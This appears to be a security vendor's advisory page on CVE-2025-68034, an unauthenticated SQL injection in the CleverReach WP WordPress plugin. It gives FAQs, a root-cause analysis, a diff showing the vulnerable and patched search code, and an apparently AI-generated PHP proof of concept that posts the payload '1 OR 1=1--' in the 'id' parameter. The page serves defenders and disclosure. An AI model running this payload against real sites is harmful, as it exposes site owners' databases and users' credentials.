What is CVE-2025-68034?

CVE-2025-68034 is a high-severity SQL injection vulnerability found in the CleverReach® WP plugin for WordPress, affecting versions up to 1.5.21. It allows unauthenticated attackers to inject arbitrary SQL queries into the database through insufficient input validation.

How does the SQL injection work?

The vulnerability arises from the improper handling of user-supplied parameters in SQL queries. Attackers can send specially crafted requests to the plugin’s search endpoint, appending malicious SQL code that can manipulate the database and extract sensitive information.

Who is affected by this vulnerability?

Any WordPress site using the CleverReach® WP plugin version 1.5.21 or earlier is at risk. Administrators should check their plugin version against the patched version 1.5.22 to determine if they are affected.

How can I check if my site is vulnerable?

To check if your site is vulnerable, navigate to the WordPress admin dashboard, go to the Plugins section, and look for the CleverReach® WP plugin. Verify the version number; if it is 1.5.21 or earlier, your site is vulnerable.

How can I fix the vulnerability?

The recommended fix is to update the CleverReach® WP plugin to version 1.5.22 or later, where the SQL injection vulnerability has been patched. Regularly updating plugins is essential for maintaining site security.

What does the CVSS score of 7.5 indicate?

A CVSS score of 7.5 indicates a high severity level, suggesting that the vulnerability is relatively easy to exploit and poses a significant risk to the affected systems. It is crucial for administrators to address such vulnerabilities promptly.

What are the potential consequences of exploitation?

Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data, including user credentials and personal information. This could result in data breaches, site compromise, and further attacks on the web application.

What is the proof of concept for this vulnerability?

The proof of concept involves sending a POST request to the plugin’s search endpoint with a malicious payload that manipulates SQL queries. This demonstrates how an attacker can bypass intended filters and execute arbitrary SQL commands.

What are the best practices to mitigate SQL injection risks?

To mitigate SQL injection risks, always validate and sanitize user inputs, use prepared statements for database queries, and regularly update plugins and themes. Implementing a web application firewall can also help detect and block malicious requests.

How can I stay informed about vulnerabilities?

To stay informed about vulnerabilities, subscribe to security mailing lists, follow security blogs, and regularly check databases like the National Vulnerability Database (NVD) or CVE details. Staying updated helps in timely patching and securing your site.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the CleverReach® WP plugin until a patch can be applied. Additionally, review access logs for any suspicious activity and implement security measures to protect the database.

Is it safe to use CleverReach® WP after updating?

After updating to version 1.5.22 or later, the specific vulnerability is addressed. However, it is essential to maintain good security practices, including regular updates and monitoring for new vulnerabilities.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2025-68034: CleverReach® WP <= 1.5.21 – Unauthenticated SQL Injection (cleverreach-wp)

CVE ID CVE-2025-68034

Plugin cleverreach-wp

Severity High (CVSS 7.5)

CWE 89

Vulnerable Version 1.5.21

Patched Version 1.5.22

Disclosed January 14, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68034:
This vulnerability is an unauthenticated SQL injection in the CleverReach® WP WordPress plugin, affecting versions up to and including 1.5.21. The flaw resides in the article search functionality, allowing attackers to inject arbitrary SQL commands. The CVSS score of 7.5 (High) reflects the attack’s low complexity and the potential for data extraction.

The root cause is insufficient input validation and a lack of prepared statements for the ‘id’ parameter in the `search()` method. In the vulnerable code at cleverreach-wp/Controllers/class-clever-reach-article-search-controller.php, lines 147-149, the plugin directly concatenates the user-controlled `$id` variable into an SQL condition: `$filters[] = “ID = $id”;`. The `$id` parameter originates from the `get_param(‘id’)` call on line 144. No sanitization or type casting occurs before this value is embedded into the SQL query fragment.

Exploitation occurs via a POST request to the plugin’s public endpoint, which is routed through the `run()` method. The `validate_request()` function requires the `get` parameter to be ‘search’ and either the `id` or `title` parameter to be non-empty. An attacker sends a POST request to the plugin’s endpoint with `get=search` and an `id` parameter containing a malicious SQL payload, such as `1 OR 1=1–`. This payload bypasses the intended ID filter and appends additional SQL logic, enabling data extraction from the WordPress database.

The patch addresses the vulnerability in the `search()` method between lines 158 and 168. It introduces a strict validation check using `ctype_digit($raw_id)` to ensure the `id` parameter contains only digits. If validation fails, the plugin returns a JSON error with a 400 status code. For valid numeric input, the patch casts the parameter to an integer `(int) $raw_id` and uses the WordPress database method `$wpdb->prepare(‘ID = %d’, $id)` to safely bind the integer value into the SQL query. This change ensures proper parameterization and prevents SQL injection.

Successful exploitation allows unauthenticated attackers to execute arbitrary SQL queries on the underlying database. Attackers can extract sensitive information, including user credentials (hashed passwords), personal data, and other content stored within the WordPress tables. This can lead to a full site compromise, privilege escalation, or data exfiltration.

Differential between vulnerable and patched code

Code Diff

--- a/cleverreach-wp/Controllers/class-clever-reach-article-search-controller.php
+++ b/cleverreach-wp/Controllers/class-clever-reach-article-search-controller.php
@@ -1,235 +1,240 @@
-<?php
-/**
- * CleverReach WordPress Integration.
- *
- * @package CleverReach
- */
-
-namespace CleverReachWordPressControllers;
-
-use CleverReachWordPressComponentsUtilitySchema_Provider;
-use CleverReachWordPressComponentsUtilitySearch_Results_Provider;
-use CleverReachWordPressIntegrationCoreBusinessLogicUtilityArticleSearchConditions;
-
-if ( ! defined( 'ABSPATH' ) ) {
-	exit; // Exit if accessed directly.
-}
-
-/**
- * Class Clever_Reach_Article_Search_Controller
- *
- * @package CleverReachWordPressControllers
- */
-class Clever_Reach_Article_Search_Controller extends Clever_Reach_Base_Controller {
-
-	/**
-	 * Schema provider
-	 *
-	 * @var Schema_Provider
-	 */
-	private $schema_provider;
-
-	/**
-	 * Search results provider
-	 *
-	 * @var Search_Results_Provider
-	 */
-	private $search_results_provider;
-
-	/**
-	 * Clever_Reach_Article_Search_Controller constructor
-	 */
-	public function __construct() {
-		$this->is_internal = false;
-	}
-
-	/**
-	 * Gets all searchable items
-	 */
-	public function cleverreach_items() {
-		$this->die_json( $this->get_schema_provider()->get_searchable_items()->toArray() );
-	}
-
-	/**
-	 * Gets searchable schema for specific type
-	 */
-	public function cleverreach_schema() {
-		try {
-			$this->die_json( $this->get_schema_provider()->get_schema( $this->get_param( 'type' ) )->toArray() );
-		} catch ( Exception $exception ) {
-			$this->die_json(
-				array(
-					'status'  => 'error',
-					'message' => $exception->getMessage(),
-				)
-			);
-		}
-	}
-
-	/**
-	 * Gets search item results based on type and filters
-	 */
-	public function cleverreach_search() {
-		try {
-			$type   = $this->get_param( 'type' );
-			$filter = $this->get_param( 'filter' );
-			$id     = $this->get_param( 'id' );
-			if ( null !== $id ) {
-				$equal_condition = Conditions::EQUALS;
-				$filter          = "ID $equal_condition $id";
-			}
-
-			$this->die_json( $this->get_search_results_provider()->get_search_results( $type, $filter )->toArray() );
-		} catch ( Exception $exception ) {
-			$this->die_json(
-				array(
-					'status'  => 'error',
-					'message' => $exception->getMessage(),
-				)
-			);
-		}
-	}
-
-	/**
-	 * Public endpoint for article
-	 */
-	public function run() {
-		$action = $this->get_param( 'get' );
-
-		$this->validate_request( $action );
-
-		if ( 'filter' === $action ) {
-			$response = $this->get_filters();
-		} else {
-			$response = $this->search();
-		}
-
-		$this->die_json( $response );
-	}
-
-	/**
-	 * Checks if all parameters are set as required.
-	 *
-	 * @param string $action Requested action.
-	 */
-	private function validate_request( $action ) {
-		$id    = $this->get_param( 'id' );
-		$title = $this->get_param( 'title' );
-
-		if ( null === $action
-			|| ( 'search' === $action && empty( $id ) && empty( $title ) )
-			|| ! $this->is_post()
-			|| ! in_array( $action, array( 'filter', 'search' ), true )
-		) {
-			status_header( 404 );
-
-			exit();
-		}
-	}
-
-	/**
-	 * Returns search filters, used to search for data.
-	 *
-	 * @return array
-	 */
-	private function get_filters() {
-		return array(
-			array(
-				'name'        => __( 'Article ID', 'cleverreach-wp' ),
-				'description' => '',
-				'required'    => false,
-				'query_key'   => 'id',
-				'type'        => 'input',
-			),
-			array(
-				'name'        => __( 'Article Title', 'cleverreach-wp' ),
-				'description' => '',
-				'required'    => false,
-				'query_key'   => 'title',
-				'type'        => 'input',
-			),
-		);
-	}
-
-	/**
-	 * Performs a search using search term provided in the request.
-	 *
-	 * @return array
-	 */
-	private function search() {
-		global $wpdb;
-		$filters = array( "post_type IN ('post', 'page')" );
-
-		$id = $this->get_param( 'id' );
-		if ( ! empty( $id ) ) {
-			$filters[] = "ID = $id";
-		}
-
-		$title = $this->get_param( 'title' );
-		if ( ! empty( $title ) ) {
-			$safe_title = $wpdb->esc_like( sanitize_text_field( $title ) );
-			$filters[]  = $wpdb->prepare( 'post_title LIKE %s', '%' . $safe_title . '%' );
-		}
-
-		$articles = $this->get_search_results_provider()->get_standard_article_search_results( $filters );
-
-		return array(
-			'settings' => array(
-				'type'                => 'content',
-				'link_editable'       => false,
-				'link_text_editable'  => true,
-				'image_size_editable' => true,
-			),
-			'items'    => $this->format_articles( $articles ),
-		);
-	}
-
-	/**
-	 * Retrieves products by their IDs and prepares them in appropriate format for the response.
-	 *
-	 * @param array $articles Array of articles.
-	 *
-	 * @return array
-	 */
-	private function format_articles( $articles ) {
-		$results = array();
-		foreach ( $articles as $article ) {
-			$image     = get_the_post_thumbnail_url( $article['ID'] );
-			$results[] = array(
-				'title'       => $article['post_title'],
-				'description' => wp_strip_all_tags( $article['post_content'] ),
-				'content'     => '<!--#html #-->' . $article['post_content'] . '<!--#/html#-->',
-				'image'       => false !== $image ? $image : '',
-				'url'         => $article['guid'],
-			);
-		}
-
-		return $results;
-	}
-
-	/**
-	 * Gets schema provider
-	 *
-	 * @return Schema_Provider
-	 */
-	private function get_schema_provider() {
-		if ( null === $this->schema_provider ) {
-			$this->schema_provider = new Schema_Provider();
-		}
-
-		return $this->schema_provider;
-	}
-
-	/**
-	 * Gets search result provider
-	 *
-	 * @return Search_Results_Provider
-	 */
-	private function get_search_results_provider() {
-		if ( null === $this->search_results_provider ) {
-			$this->search_results_provider = new Search_Results_Provider();
-		}
-
-		return $this->search_results_provider;
-	}
-}
+<?php
+/**
+ * CleverReach WordPress Integration.
+ *
+ * @package CleverReach
+ */
+
+namespace CleverReachWordPressControllers;
+
+use CleverReachWordPressComponentsUtilitySchema_Provider;
+use CleverReachWordPressComponentsUtilitySearch_Results_Provider;
+use CleverReachWordPressIntegrationCoreBusinessLogicUtilityArticleSearchConditions;
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit; // Exit if accessed directly.
+}
+
+/**
+ * Class Clever_Reach_Article_Search_Controller
+ *
+ * @package CleverReachWordPressControllers
+ */
+class Clever_Reach_Article_Search_Controller extends Clever_Reach_Base_Controller {
+
+	/**
+	 * Schema provider
+	 *
+	 * @var Schema_Provider
+	 */
+	private $schema_provider;
+
+	/**
+	 * Search results provider
+	 *
+	 * @var Search_Results_Provider
+	 */
+	private $search_results_provider;
+
+	/**
+	 * Clever_Reach_Article_Search_Controller constructor
+	 */
+	public function __construct() {
+		$this->is_internal = false;
+	}
+
+	/**
+	 * Gets all searchable items
+	 */
+	public function cleverreach_items() {
+		$this->die_json( $this->get_schema_provider()->get_searchable_items()->toArray() );
+	}
+
+	/**
+	 * Gets searchable schema for specific type
+	 */
+	public function cleverreach_schema() {
+		try {
+			$this->die_json( $this->get_schema_provider()->get_schema( $this->get_param( 'type' ) )->toArray() );
+		} catch ( Exception $exception ) {
+			$this->die_json(
+				array(
+					'status'  => 'error',
+					'message' => $exception->getMessage(),
+				)
+			);
+		}
+	}
+
+	/**
+	 * Gets search item results based on type and filters
+	 */
+	public function cleverreach_search() {
+		try {
+			$type   = $this->get_param( 'type' );
+			$filter = $this->get_param( 'filter' );
+			$id     = $this->get_param( 'id' );
+			if ( null !== $id ) {
+				$equal_condition = Conditions::EQUALS;
+				$filter          = "ID $equal_condition $id";
+			}
+
+			$this->die_json( $this->get_search_results_provider()->get_search_results( $type, $filter )->toArray() );
+		} catch ( Exception $exception ) {
+			$this->die_json(
+				array(
+					'status'  => 'error',
+					'message' => $exception->getMessage(),
+				)
+			);
+		}
+	}
+
+	/**
+	 * Public endpoint for article
+	 */
+	public function run() {
+		$action = $this->get_param( 'get' );
+
+		$this->validate_request( $action );
+
+		if ( 'filter' === $action ) {
+			$response = $this->get_filters();
+		} else {
+			$response = $this->search();
+		}
+
+		$this->die_json( $response );
+	}
+
+	/**
+	 * Checks if all parameters are set as required.
+	 *
+	 * @param string $action Requested action.
+	 */
+	private function validate_request( $action ) {
+		$id    = $this->get_param( 'id' );
+		$title = $this->get_param( 'title' );
+
+		if ( null === $action
+			|| ( 'search' === $action && empty( $id ) && empty( $title ) )
+			|| ! $this->is_post()
+			|| ! in_array( $action, array( 'filter', 'search' ), true )
+		) {
+			status_header( 404 );
+
+			exit();
+		}
+	}
+
+	/**
+	 * Returns search filters, used to search for data.
+	 *
+	 * @return array
+	 */
+	private function get_filters() {
+		return array(
+			array(
+				'name'        => __( 'Article ID', 'cleverreach-wp' ),
+				'description' => '',
+				'required'    => false,
+				'query_key'   => 'id',
+				'type'        => 'input',
+			),
+			array(
+				'name'        => __( 'Article Title', 'cleverreach-wp' ),
+				'description' => '',
+				'required'    => false,
+				'query_key'   => 'title',
+				'type'        => 'input',
+			),
+		);
+	}
+
+	/**
+	 * Performs a search using search term provided in the request.
+	 *
+	 * @return array
+	 */
+	private function search() {
+		global $wpdb;
+		$filters = array( "post_type IN ('post', 'page')" );
+
+		$raw_id = $this->get_param('id');
+		if ($raw_id !== '' && !ctype_digit($raw_id)) {
+			wp_send_json_error(['message' => 'Invalid ID parameter'], 400);
+		}
+
+		$id = (int) $raw_id;
+		if ($id > 0) {
+			$filters[] = $wpdb->prepare('ID = %d', $id);
+		}
+
+		$title = $this->get_param( 'title' );
+		if ( ! empty( $title ) ) {
+			$safe_title = $wpdb->esc_like( sanitize_text_field( $title ) );
+			$filters[]  = $wpdb->prepare( 'post_title LIKE %s', '%' . $safe_title . '%' );
+		}
+
+		$articles = $this->get_search_results_provider()->get_standard_article_search_results( $filters );
+
+		return array(
+			'settings' => array(
+				'type'                => 'content',
+				'link_editable'       => false,
+				'link_text_editable'  => true,
+				'image_size_editable' => true,
+			),
+			'items'    => $this->format_articles( $articles ),
+		);
+	}
+
+	/**
+	 * Retrieves products by their IDs and prepares them in appropriate format for the response.
+	 *
+	 * @param array $articles Array of articles.
+	 *
+	 * @return array
+	 */
+	private function format_articles( $articles ) {
+		$results = array();
+		foreach ( $articles as $article ) {
+			$image     = get_the_post_thumbnail_url( $article['ID'] );
+			$results[] = array(
+				'title'       => $article['post_title'],
+				'description' => wp_strip_all_tags( $article['post_content'] ),
+				'content'     => '<!--#html #-->' . $article['post_content'] . '<!--#/html#-->',
+				'image'       => false !== $image ? $image : '',
+				'url'         => $article['guid'],
+			);
+		}
+
+		return $results;
+	}
+
+	/**
+	 * Gets schema provider
+	 *
+	 * @return Schema_Provider
+	 */
+	private function get_schema_provider() {
+		if ( null === $this->schema_provider ) {
+			$this->schema_provider = new Schema_Provider();
+		}
+
+		return $this->schema_provider;
+	}
+
+	/**
+	 * Gets search result provider
+	 *
+	 * @return Search_Results_Provider
+	 */
+	private function get_search_results_provider() {
+		if ( null === $this->search_results_provider ) {
+			$this->search_results_provider = new Search_Results_Provider();
+		}
+
+		return $this->search_results_provider;
+	}
+}
--- a/cleverreach-wp/cleverreach-wp.php
+++ b/cleverreach-wp/cleverreach-wp.php
@@ -1,26 +1,26 @@
-<?php
-/**
- * CleverReach WordPress Integration.
- *
- * @package CleverReach
- */
-
-/*
-Plugin Name: CleverReach® WP
-Plugin URI: https://wordpress.org/plugins/cleverreach-wp/
-Description: Spotify, Levi’s and DHL create and send their newsletters with CleverReach®: easy to handle and at the same time all requirements for professional email marketing.
-Version: 1.5.21
-Author: CleverReach GmbH & Co. KG
-Author URI: https://www.cleverreach.com
-License: GPL
-*/
-if ( ! defined( 'ABSPATH' ) ) {
-	exit; // Exit if accessed directly.
-}
-
-global $wpdb;
-
-require_once plugin_dir_path( __FILE__ ) . '/vendor/autoload.php';
-require_once trailingslashit( __DIR__ ) . 'inc/autoloader.php';
-
-CleverReachWordPressPlugin::instance( $wpdb, __FILE__ );
+<?php
+/**
+ * CleverReach WordPress Integration.
+ *
+ * @package CleverReach
+ */
+
+/*
+Plugin Name: CleverReach® WP
+Plugin URI: https://wordpress.org/plugins/cleverreach-wp/
+Description: Spotify, Levi’s and DHL create and send their newsletters with CleverReach®: easy to handle and at the same time all requirements for professional email marketing.
+Version: 1.5.22
+Author: CleverReach GmbH & Co. KG
+Author URI: https://www.cleverreach.com
+License: GPL
+*/
+if ( ! defined( 'ABSPATH' ) ) {
+	exit; // Exit if accessed directly.
+}
+
+global $wpdb;
+
+require_once plugin_dir_path( __FILE__ ) . '/vendor/autoload.php';
+require_once trailingslashit( __DIR__ ) . 'inc/autoloader.php';
+
+CleverReachWordPressPlugin::instance( $wpdb, __FILE__ );
--- a/cleverreach-wp/vendor/autoload.php
+++ b/cleverreach-wp/vendor/autoload.php
@@ -4,4 +4,4 @@

 require_once __DIR__ . '/composer/autoload_real.php';

-return ComposerAutoloaderInit09e562ac510c93f06f3ddb243050dcb8::getLoader();
+return ComposerAutoloaderInit97ee7d8522d16d2ba69ff239b78c78c0::getLoader();
--- a/cleverreach-wp/vendor/composer/autoload_real.php
+++ b/cleverreach-wp/vendor/composer/autoload_real.php
@@ -2,7 +2,7 @@

 // autoload_real.php @generated by Composer

-class ComposerAutoloaderInit09e562ac510c93f06f3ddb243050dcb8
+class ComposerAutoloaderInit97ee7d8522d16d2ba69ff239b78c78c0
 {
     private static $loader;

@@ -24,15 +24,15 @@

         require __DIR__ . '/platform_check.php';

-        spl_autoload_register(array('ComposerAutoloaderInit09e562ac510c93f06f3ddb243050dcb8', 'loadClassLoader'), true, true);
+        spl_autoload_register(array('ComposerAutoloaderInit97ee7d8522d16d2ba69ff239b78c78c0', 'loadClassLoader'), true, true);
         self::$loader = $loader = new ComposerAutoloadClassLoader(dirname(dirname(__FILE__)));
-        spl_autoload_unregister(array('ComposerAutoloaderInit09e562ac510c93f06f3ddb243050dcb8', 'loadClassLoader'));
+        spl_autoload_unregister(array('ComposerAutoloaderInit97ee7d8522d16d2ba69ff239b78c78c0', 'loadClassLoader'));

         $useStaticLoader = PHP_VERSION_ID >= 50600 && !defined('HHVM_VERSION') && (!function_exists('zend_loader_file_encoded') || !zend_loader_file_encoded());
         if ($useStaticLoader) {
             require __DIR__ . '/autoload_static.php';

-            call_user_func(ComposerAutoloadComposerStaticInit09e562ac510c93f06f3ddb243050dcb8::getInitializer($loader));
+            call_user_func(ComposerAutoloadComposerStaticInit97ee7d8522d16d2ba69ff239b78c78c0::getInitializer($loader));
         } else {
             $map = require __DIR__ . '/autoload_namespaces.php';
             foreach ($map as $namespace => $path) {
--- a/cleverreach-wp/vendor/composer/autoload_static.php
+++ b/cleverreach-wp/vendor/composer/autoload_static.php
@@ -4,7 +4,7 @@

 namespace ComposerAutoload;

-class ComposerStaticInit09e562ac510c93f06f3ddb243050dcb8
+class ComposerStaticInit97ee7d8522d16d2ba69ff239b78c78c0
 {
     public static $prefixLengthsPsr4 = array (
         'C' =>
@@ -52,9 +52,9 @@
     public static function getInitializer(ClassLoader $loader)
     {
         return Closure::bind(function () use ($loader) {
-            $loader->prefixLengthsPsr4 = ComposerStaticInit09e562ac510c93f06f3ddb243050dcb8::$prefixLengthsPsr4;
-            $loader->prefixDirsPsr4 = ComposerStaticInit09e562ac510c93f06f3ddb243050dcb8::$prefixDirsPsr4;
-            $loader->classMap = ComposerStaticInit09e562ac510c93f06f3ddb243050dcb8::$classMap;
+            $loader->prefixLengthsPsr4 = ComposerStaticInit97ee7d8522d16d2ba69ff239b78c78c0::$prefixLengthsPsr4;
+            $loader->prefixDirsPsr4 = ComposerStaticInit97ee7d8522d16d2ba69ff239b78c78c0::$prefixDirsPsr4;
+            $loader->classMap = ComposerStaticInit97ee7d8522d16d2ba69ff239b78c78c0::$classMap;

         }, null, ClassLoader::class);
     }

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-68034 - CleverReach® WP <= 1.5.21 - Unauthenticated SQL Injection
<?php

$target_url = 'http://vulnerable-wordpress-site.com/wp-content/plugins/cleverreach-wp/Controllers/class-clever-reach-article-search-controller.php';
// The exact endpoint may vary; the plugin's public endpoint is typically accessed via a specific route.
// This PoC demonstrates the parameter and payload structure.

$payload = "1 OR 1=1--";

$post_data = array(
    'get' => 'search',
    'id' => $payload
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Response Code: $http_coden";
echo "Response Body:n$responsen";

// A successful injection may return database records or cause a visible change in the response.
// More complex payloads can be used for UNION-based or time-based blind SQL injection.
?>

Frequently Asked Questions

What is CVE-2025-68034?
Overview of the vulnerability
CVE-2025-68034 is a high-severity SQL injection vulnerability found in the CleverReach® WP plugin for WordPress, affecting versions up to 1.5.21. It allows unauthenticated attackers to inject arbitrary SQL queries into the database through insufficient input validation.
How does the SQL injection work?
Mechanism of exploitation
The vulnerability arises from the improper handling of user-supplied parameters in SQL queries. Attackers can send specially crafted requests to the plugin’s search endpoint, appending malicious SQL code that can manipulate the database and extract sensitive information.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the CleverReach® WP plugin version 1.5.21 or earlier is at risk. Administrators should check their plugin version against the patched version 1.5.22 to determine if they are affected.
How can I check if my site is vulnerable?
Version verification steps
To check if your site is vulnerable, navigate to the WordPress admin dashboard, go to the Plugins section, and look for the CleverReach® WP plugin. Verify the version number; if it is 1.5.21 or earlier, your site is vulnerable.
How can I fix the vulnerability?
Updating the plugin
The recommended fix is to update the CleverReach® WP plugin to version 1.5.22 or later, where the SQL injection vulnerability has been patched. Regularly updating plugins is essential for maintaining site security.
What does the CVSS score of 7.5 indicate?
Understanding risk levels
A CVSS score of 7.5 indicates a high severity level, suggesting that the vulnerability is relatively easy to exploit and poses a significant risk to the affected systems. It is crucial for administrators to address such vulnerabilities promptly.
What are the potential consequences of exploitation?
Impact of successful attacks
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data, including user credentials and personal information. This could result in data breaches, site compromise, and further attacks on the web application.
What is the proof of concept for this vulnerability?
Demonstrating the exploit
The proof of concept involves sending a POST request to the plugin’s search endpoint with a malicious payload that manipulates SQL queries. This demonstrates how an attacker can bypass intended filters and execute arbitrary SQL commands.
What are the best practices to mitigate SQL injection risks?
Preventive measures
To mitigate SQL injection risks, always validate and sanitize user inputs, use prepared statements for database queries, and regularly update plugins and themes. Implementing a web application firewall can also help detect and block malicious requests.
How can I stay informed about vulnerabilities?
Keeping up-to-date with security
To stay informed about vulnerabilities, subscribe to security mailing lists, follow security blogs, and regularly check databases like the National Vulnerability Database (NVD) or CVE details. Staying updated helps in timely patching and securing your site.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If immediate updates are not possible, consider disabling the CleverReach® WP plugin until a patch can be applied. Additionally, review access logs for any suspicious activity and implement security measures to protect the database.
Is it safe to use CleverReach® WP after updating?
Post-update considerations
After updating to version 1.5.22 or later, the specific vulnerability is addressed. However, it is essential to maintain good security practices, including regular updates and monitoring for new vulnerabilities.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations